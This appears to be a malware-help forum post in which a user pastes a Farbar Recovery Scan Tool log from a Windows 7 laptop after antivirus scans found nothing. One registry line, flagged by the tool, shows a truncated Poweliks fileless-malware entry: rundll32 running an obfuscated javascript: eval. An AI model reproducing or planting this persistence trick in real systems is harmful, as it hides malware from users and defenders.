Antivirus and spy bot don't detect anything.



Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014
Ran by My Computer (administrator) on MYCOMPUTER-PC on 10-11-2014 18:33:11
Running from C:\Users\My Computer\Desktop
Loaded Profile: My Computer (Available profiles: My Computer)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Windows\System32\GFNEXSrv.exe
(Nitro PDF Software) C:\Program Files\Common Files\Nitro\Reader\3.0\NitroPDFReaderDriverService3x64.exe
(Symantec Corporation) C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TBS\HSON.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\FlashCards\TCrdMain.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\ReelTime\TosReelTimeMonitor.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\ToolbarUpdater.exe
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\loggingserver.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(TOSHIBA Corporation) C:\Program Files\Toshiba\TECO\TecoService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHWMsg.exe
(Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\SeaPort.EXE
(Advanced Micro Devices, Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MMLoadDrv.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [590256 2011-05-17] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [296824 2010-09-25] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12558440 2011-07-07] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2226280 2011-06-03] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-03] (Synaptics Incorporated)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1544624 2011-05-24] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-10] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [712096 2011-07-01] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [343168 2011-10-13] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [4085896 2014-07-31] (AVAST Software)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-11] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6462744 2014-08-21] (Piriform Ltd)
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\MountPoints2: {4edd8e39-d1f2-11e3-830a-386077ebbde8} - E:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\MountPoints2: {d329bad1-4974-11e3-99b5-386077ebbde8} - E:\LaunchU3.exe
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.msn.com/?pc=AV01
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://start.toshiba.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://start.toshiba.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Bar = http://www.msn.com/?pc=AV01
SearchScopes: HKLM - DefaultScope {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 - DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKCU - DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {53439EBD-1E47-44D0-AC6E-AFBB1C5FFB6C} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=
SearchScopes: HKCU - {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKCU - {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = http://search.coupons.com/search.asp?p=df&q={searchTerms}
SearchScopes: HKCU - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
BHO: avast! Ad Blocker -> {FFCB3198-32F3-4E8B-9539-4324694ED663} -> C:\Program Files (x86)\AVAST Software\avast! Ad Blocker IE\Adblocker64.dll (AVAST Software)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
BHO-x32: avast! Ad Blocker -> {FFCB3198-32F3-4E8B-9539-4324694ED663} -> C:\Program Files (x86)\AVAST Software\avast! Ad Blocker IE\Adblocker32.dll (AVAST Software)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} - No File
Toolbar: HKLM-x32 - No Name - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.7\ViProtocol.dll (AVG Secure Search)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1213153.dll (Adobe Systems, Inc.)
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.7\\npsitesafety.dll No File
FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Reader 3\npnitromozilla.dll (Nitro PDF)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-01-12]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://mysearch.avg.com?cid={C5A5FB70-D1E9-4A53-A320-CCB386C446A5}&mid=02c46f78a88847d0bb19e929310f541b-671ef39aac1444e99a49d5d3d7f7fe13e79e8395&lang=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-06-13 12:39:30&v=18.1.0.443&pid=safeguard&sg=&sap=hp"
CHR Profile: C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-06-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]
CHR Extension: (Google Wallet) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-12]
CHR HKLM-x32\...\Chrome\Extension: [fplhdcjmbpfkejbhngmlngaecbjmoimd] - C:\Program Files\AVAST Software\Avast\AdBlocker\Chrome\avast-adblocker-chrome.crx []
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-07-21]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S2 appdrvrem01; C:\Windows\System32\appdrvrem01.exe [551896 2012-03-12] (Protection Technology)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-07-21] (AVAST Software)
R2 GFNEXSrv; C:\Windows\System32\GFNEXSrv.exe [162824 2010-09-09] ()
R2 NitroReaderDriverReadSpool3; C:\Program Files\Common Files\Nitro\Reader\3.0\NitroPDFReaderDriverService3x64.exe [230416 2013-06-18] (Nitro PDF Software)
R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [132504 2013-10-20] (Symantec Corporation)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 vToolbarUpdater18.1.7; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\ToolbarUpdater.exe [1808408 2014-06-14] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 appdrv01; C:\Windows\System32\Drivers\appdrv01.sys [3854000 2012-03-12] (Protection Technology)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-07-21] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [79184 2014-07-21] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-07-21] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-07-21] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1041168 2014-07-21] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [427360 2014-07-21] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [92008 2014-07-21] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [224896 2014-07-21] ()
S3 ssmirrdr; C:\Windows\System32\DRIVERS\ssmirrdr.sys [10112 2011-03-15] (support.com, Inc)
U3 aswMBR; \??\C:\Users\MYCOMP~1\AppData\Local\Temp\aswMBR.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-10 18:33 - 2014-11-10 18:33 - 00020013 _____ () C:\Users\My Computer\Desktop\FRST.txt
2014-11-10 18:32 - 2014-11-10 18:06 - 05194752 _____ (AVAST Software) C:\Users\My Computer\Desktop\aswMBR.exe
2014-11-10 18:32 - 2014-11-10 17:58 - 02116096 _____ (Farbar) C:\Users\My Computer\Desktop\FRST64.exe
2014-11-10 18:06 - 2014-11-10 18:06 - 05194752 _____ (AVAST Software) C:\Users\My Computer\Downloads\aswMBR.exe
2014-11-10 18:02 - 2014-11-10 18:14 - 00028065 _____ () C:\Users\My Computer\Downloads\Addition.txt
2014-11-10 18:00 - 2014-11-10 18:33 - 00000000 ____D () C:\FRST
2014-11-10 18:00 - 2014-11-10 18:29 - 00017669 _____ () C:\Users\My Computer\Downloads\FRST.txt
2014-11-10 17:58 - 2014-11-10 17:58 - 02116096 _____ (Farbar) C:\Users\My Computer\Downloads\FRST64.exe
2014-11-10 17:57 - 2014-11-10 17:57 - 00017782 _____ () C:\Users\My Computer\Desktop\download.htm
2014-11-10 17:55 - 2014-11-10 17:55 - 00000207 _____ () C:\windows\tweaking.com-regbackup-MYCOMPUTER-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-11-10 17:52 - 2014-11-10 17:52 - 00000000 ____D () C:\RegBackup
2014-11-10 17:51 - 2014-11-10 17:51 - 01346048 _____ (Indigo Rose Corporation) C:\Users\My Computer\Desktop\uninstall.exe
2014-11-10 17:51 - 2014-11-10 17:51 - 00325960 _____ () C:\Users\My Computer\Desktop\lua5.1.dll
2014-11-10 17:51 - 2014-11-10 17:51 - 00001567 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\Uninstall
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\files
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\color_presets
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-11-10 17:50 - 2014-11-10 17:50 - 04215584 _____ () C:\Users\My Computer\Downloads\tweaking.com_registry_backup_setup.exe
2014-11-10 17:46 - 2014-11-10 17:49 - 00000000 ____D () C:\Users\My Computer\Desktop\New folder (3)
2014-11-09 23:33 - 2014-11-09 23:39 - 122307832 _____ (Microsoft Corporation) C:\Users\My Computer\Downloads\msert.exe
2014-11-09 03:24 - 2009-06-10 16:00 - 00000824 _____ () C:\windows\system32\Drivers\etc\hosts.20141109-032450.backup
2014-11-09 02:10 - 2014-11-09 02:10 - 00068328 _____ () C:\Users\My Computer\AppData\Local\GDIPFONTCACHEV1.DAT
2014-11-09 02:07 - 2014-11-09 02:08 - 00303648 _____ () C:\windows\system32\FNTCACHE.DAT
2014-11-09 02:07 - 2014-11-09 02:07 - 00002036 _____ () C:\windows\PFRO.log
2014-11-09 00:42 - 2014-11-09 23:07 - 00000336 _____ () C:\windows\setupact.log
2014-11-09 00:42 - 2014-11-09 00:42 - 00000000 _____ () C:\windows\setuperr.log
2014-11-08 20:26 - 2014-11-10 18:18 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-06 20:50 - 2014-11-06 20:50 - 00001362 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-11-06 20:50 - 2014-11-06 20:50 - 00001350 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-11-06 20:50 - 2014-11-06 20:50 - 00000656 _____ () C:\windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000628 _____ () C:\windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000458 _____ () C:\windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-11-06 20:49 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\windows\system32\sdnclean64.exe
2014-11-06 20:46 - 2014-11-06 20:49 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\My Computer\Downloads\spybot-2.4.exe
2014-11-04 23:10 - 2014-11-04 23:10 - 00000460 _____ () C:\Users\My Computer\Documents\cc_20141104_231029.reg
2014-11-04 17:22 - 2014-11-10 18:33 - 00199191 _____ () C:\windows\WindowsUpdate.log
2014-11-03 19:24 - 2014-11-03 19:24 - 00188487 _____ () C:\Users\My Computer\Downloads\Rustbelt_Middle_Values_Only_10.23.14.xlsx
2014-10-22 11:49 - 2014-10-22 11:49 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (4).xls
2014-10-22 11:38 - 2014-10-22 11:38 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (3).xls
2014-10-22 11:31 - 2014-10-22 11:31 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3 (2).xls
2014-10-22 11:30 - 2014-10-22 11:30 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (2).xls
2014-10-22 11:03 - 2014-10-22 11:03 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (4).xls
2014-10-22 11:03 - 2014-10-22 11:03 - 00070144 _____ () C:\Users\My Computer\Downloads\UP3477WS9 (1).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (3).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3 (1).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00065536 _____ () C:\Users\My Computer\Downloads\UP3477WS11.xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6 (2).xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6 (1).xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00061952 _____ () C:\Users\My Computer\Downloads\UP3477WS8.xls
2014-10-22 11:00 - 2014-10-22 11:00 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (1).xls
2014-10-22 10:58 - 2014-10-22 10:58 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (2).xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (1).xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00070144 _____ () C:\Users\My Computer\Downloads\UP3477WS9.xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3.xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00024576 _____ () C:\Users\My Computer\Downloads\UP3477WS7.xls
